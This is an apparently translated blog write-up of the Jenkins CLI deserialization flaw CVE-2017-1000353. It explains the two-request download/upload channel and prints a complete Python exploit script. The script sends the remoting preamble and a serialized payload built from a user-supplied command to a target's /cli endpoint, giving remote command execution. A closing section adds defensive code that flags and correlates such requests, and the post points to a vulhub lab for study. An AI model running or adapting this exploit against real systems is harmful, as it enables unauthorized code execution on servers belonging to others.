# Jenkins deserialization vulnerability CVE-2017-1000353

淩亂°似流年 2021-08-31 02:59

## 1. How the vulnerability works

This is a Java deserialization vulnerability: the command travels inside the serialized data, and the server executes it directly while deserializing.

Walking through the attack flow:

The `session` used below is a version-4 UUID, generated like this:

```python
session = uuid.uuid4()
```

**Step 1.** First, send a download request. This request opens a bidirectional data channel. The channel is identified by `session`, and the `Side` header marks the transfer direction.

![format_png][]

Corresponding code:

```python
def Download(url, session):
    headers = {'Side': 'download'}
    headers['Content-type'] = 'application/x-www-form-urlencoded'
    headers['Session'] = session
    headers['Transfer-Encoding'] = 'chunked'
    try:
        response = requests.post(url, data=Null_Payload(), headers=headers, proxies=Proxy, stream=True)
    except Exception, ex:
        print ex
        exit(0)
    print response.content
```

**Step 2.** Then the second request, the upload side of the bidirectional channel. The first request blocks until the second one is sent. The session stays the same as before, and `Side` is changed to `upload`.

![format_png 1][]

The body is laid out as follows:

(1) Preamble. The preamble contains a base64-encoded serialized object. This *Capability* object only tells the server which capabilities the client has (for example HTTP chunked encoding).

```python
Premle = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
```

(2) Proto part (probably the "extra bytes" referred to below):

```python
Proto = '\x00\x00\x00\x00'
```

(3) Payload. After the preamble and a few extra bytes, the Jenkins server expects a serialized object of type Command. Because Jenkins does not validate the serialized object, any serialized object can be sent.

```python
def Payload_Init(command):
    global File_Serialization
    command = "java -jar jenkins_payload.jar payload.ser '%s'" % str(command)
    print command
    return_number = os.system(command)
    if return_number != 0:
        print "Call Jar Packet To Init The Payload Error"
        exit(0)
    File_Serialization = open("./payload.ser", "rb").read()
```

Everything sent in the second request, assembled:

```python
def Create_Payload_Chunked():
    yield Premle
    yield Proto
    yield File_Serialization
```

Sending the second request:

```python
def Upload_Chunked(url, session, data):
    headers = {'Side': 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    headers['Transfer-Encoding'] = 'chunked'
    headers['Cache-Control'] = 'no-cache'
    try:
        response = requests.post(url, headers=headers, data=Create_Payload_Chunked(), proxies=Proxy)
    except Exception, ex:
        print ex
        exit(0)
```

The whole attack flow:

```python
def Attack():
    print "start"
    session = str(uuid.uuid4())
    thread_object = threading.Thread(target=Download, args=(Target, session))
    thread_object.start()
    time.sleep(1)
    print "pwn"
    #Upload(URL, session, create_payload())
    Upload_Chunked(Target, session, "asdf")
```

## Server-side handling

Deserializing the Command object:

![format_png 2][]

This method is called here:

![format_png 3][]

It returns the deserialized object. The `read` call assigns the returned object to `cmd`, that is, it is read in a thread of type ReaderThread.

![format_png 4][]

That thread is triggered by the `upload` method invoked in the *CliEndpointResponse* class.

![format_png 5][]

In that method the HTTP body is read and `notify` is called to wake the thread.

![format_png 6][]

## Full PoC

```python
import os
import uuid
import gzip
import zlib
import time
import urllib
import socket
import urllib3
import requests
import threading
from optparse import OptionParser

# Global variables
#Proxy = {"http":"http://127.0.0.1:8090","https":"http://127.0.0.1:8090"}  # HTTP/HTTPS proxy settings
Proxy = None  # HTTP/HTTPS proxy settings
Target = "http://%s:8080/cli"  # attack target
Premle = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
Proto = '\x00\x00\x00\x00'
File_Serialization = None
socket.setdefaulttimeout(3)

# Global functions
def Payload_Init(command):
    global File_Serialization
    command = "java -jar jenkins_payload.jar payload.ser '%s'" % str(command)
    print command
    return_number = os.system(command)
    if return_number != 0:
        print "Call Jar Packet To Init The Payload Error"
        exit(0)
    File_Serialization = open("./payload.ser", "rb").read()

def Download(url, session):
    headers = {'Side': 'download'}
    headers['Content-type'] = 'application/x-www-form-urlencoded'
    headers['Session'] = session
    headers['Transfer-Encoding'] = 'chunked'
    try:
        response = requests.post(url, data=Null_Payload(), headers=headers, proxies=Proxy, stream=True)
    except Exception, ex:
        print ex
        exit(0)
    print response.content

'''
def Upload(url, session, data):
    headers = {'Side': 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    try:
        response = requests.post(url, data=data, headers=headers, proxies=Proxy)
    except Exception, ex:
        print ex
        exit(0)
'''

def Upload_Chunked(url, session, data):
    headers = {'Side': 'upload'}
    headers['Session'] = session
    headers['Content-type'] = 'application/octet-stream'
    headers['Accept-Encoding'] = None
    headers['Transfer-Encoding'] = 'chunked'
    headers['Cache-Control'] = 'no-cache'
    try:
        response = requests.post(url, headers=headers, data=Create_Payload_Chunked(), proxies=Proxy)
    except Exception, ex:
        print ex
        exit(0)

def Null_Payload():
    yield " "

"""
def Create_Payload():
    payload = Premle + Proto + File_Serialization
    return payload
"""

def Create_Payload_Chunked():
    yield Premle
    yield Proto
    yield File_Serialization

def Attack():
    print "start"
    session = str(uuid.uuid4())
    thread_object = threading.Thread(target=Download, args=(Target, session))
    thread_object.start()
    time.sleep(1)
    print "pwn"
    #Upload(URL, session, create_payload())
    Upload_Chunked(Target, session, "asdf")

# Program entry
if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-t", "--target", dest="target", help="Target IP address!")
    parser.add_option("-c", "--command", dest="command", help="The command to execute!")
    parser.add_option("-p", "--protocol", dest="protocol", help="Protocol is HTTP or HTTPS!")
    (options, args) = parser.parse_args()
    optionslist = [options.target, options.command, options.protocol]
    if None in optionslist or "" in optionslist:
        print "Please check your input parameters!"
        exit(0)
    Target = Target % options.target
    command = options.command
    protocol = options.protocol
    if protocol == "HTTP":
        pass
    elif protocol == "HTTPS":
        Target = Target.replace("http", "https")
    else:
        print "Unknown Protocol!"
        exit(0)
    Payload_Init(command)
    Attack()
```

Target lab: [https://vulhub.org/\#/environments/jenkins/CVE-2017-1000353/][https_vulhub.org_environments_jenkins_CVE-2017-1000353]

PoC: [https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py][https_github.com_vulhub_CVE-2017-1000353_blob_master_exploit.py]

[format_png]: /images/20210728/672b8e045b5b4bf88d563d8d17bbc190.png
[format_png 1]: /images/20210728/c4d29a7657f54be687a276f322a6859f.png
[format_png 2]: /images/20210728/13d5e751bd1b4f70ad9d1022b00f71e0.png
[format_png 3]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWFnZXMyMDE3LmNuYmxvZ3MuY29tL2Jsb2cvMTA3MDMyMS8yMDE3MTIvMTA3MDMyMS0yMDE3MTIxMzE1NTMzODMxNi0yMDkxMDk2Nzk5LnBuZw?x-oss-process=image/format,png
[format_png 4]: https://imgconvert.csdnimg.cn/aHR0cHM6Ly9pbWFnZXMyMDE3LmNuYmxvZ3MuY29tL2Jsb2cvMTA3MDMyMS8yMDE3MTIvMTA3MDMyMS0yMDE3MTIxMzE1NTU1OTU5Ny0xNDA1NTgzMTkucG5n?x-oss-process=image/format,png
[format_png 5]: /images/20210728/b6e40974347d42d9af319a7ae6ea263b.png
[format_png 6]: /images/20210728/97238bdd86f14359aeee55131dae608c.png
[https_vulhub.org_environments_jenkins_CVE-2017-1000353]: https://vulhub.org/#/environments/jenkins/CVE-2017-1000353/
[https_github.com_vulhub_CVE-2017-1000353_blob_master_exploit.py]: https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py
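A defender-side companion to the request structure described above, added here as example code that is not part of the original post or the vulhub PoC: it tags proxy-captured HTTP requests that match the two-sided CLI channel pattern (POST to `/cli` with `Side` and `Session` headers, the remoting preamble, a raw Java serialization stream header after it) and correlates the download and upload sides by session id. The request records, the session id and the `classify_request`/`correlate` helper names are constructed for this example.

```python
# Added example (not from the post or the vulhub PoC): tag proxy-captured HTTP
# requests matching the CVE-2017-1000353 CLI channel pattern. Request records,
# the session id and the helper names below are constructed here.
PREAMBLE = b"<===[JENKINS REMOTING CAPACITY]===>"
STREAM_MAGIC = b"\xac\xed\x00\x05"  # java.io.ObjectOutputStream stream header
# Capability preamble quoted in the post; a legitimate channel sends it too.
CAPABILITY_B64 = b"rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4="

def header(headers, name):
    """Case-insensitive header lookup; None when absent."""
    return next((v for k, v in headers.items() if k.lower() == name.lower()), None)

def classify_request(req):
    """Return indicator tags for one request; an empty list means not CLI-related."""
    tags = []
    if req["method"] != "POST" or not req["path"].rstrip("/").endswith("/cli"):
        return tags
    side = (header(req["headers"], "Side") or "").lower()
    if side in ("download", "upload") and header(req["headers"], "Session"):
        tags.append("cli-channel-" + side)
    if side == "upload" and req["body"].startswith(PREAMBLE):
        tags.append("remoting-preamble")
        # Bytes after the preamble and capability object go to ObjectInputStream
        # unchecked; a raw stream header there is the Command the server will run.
        tail = req["body"][len(PREAMBLE) + len(CAPABILITY_B64):]
        if STREAM_MAGIC in tail:
            tags.append("raw-java-object-after-preamble")
    return tags

def correlate(requests):
    """Group tags by Session and mark sessions that opened both channel sides."""
    sessions = {}
    for req in requests:
        tags = classify_request(req)
        if tags:
            sessions.setdefault(header(req["headers"], "Session"), set()).update(tags)
    for tags in sessions.values():
        if {"cli-channel-download", "cli-channel-upload"} <= tags:
            tags.add("paired-channel")
    return sessions

# Constructed sample traffic: one unrelated request and one download/upload pair.
SID = "00000000-0000-4000-8000-000000000000"  # constructed session id
SAMPLE = [
    {"method": "GET", "path": "/login", "headers": {}, "body": b""},
    {"method": "POST", "path": "/cli", "body": b" ",
     "headers": {"Side": "download", "Session": SID, "Transfer-Encoding": "chunked"}},
    {"method": "POST", "path": "/cli", "headers": {"Side": "upload", "Session": SID},
     "body": PREAMBLE + CAPABILITY_B64 + b"\x00\x00\x00\x00" + STREAM_MAGIC + b"constructed"},
]
```

Running `correlate(SAMPLE)` returns one entry for `SID` carrying both channel sides, the preamble tag, the raw-object tag and `paired-channel`; a reverse proxy or WAF in front of Jenkins can apply the same checks to live traffic.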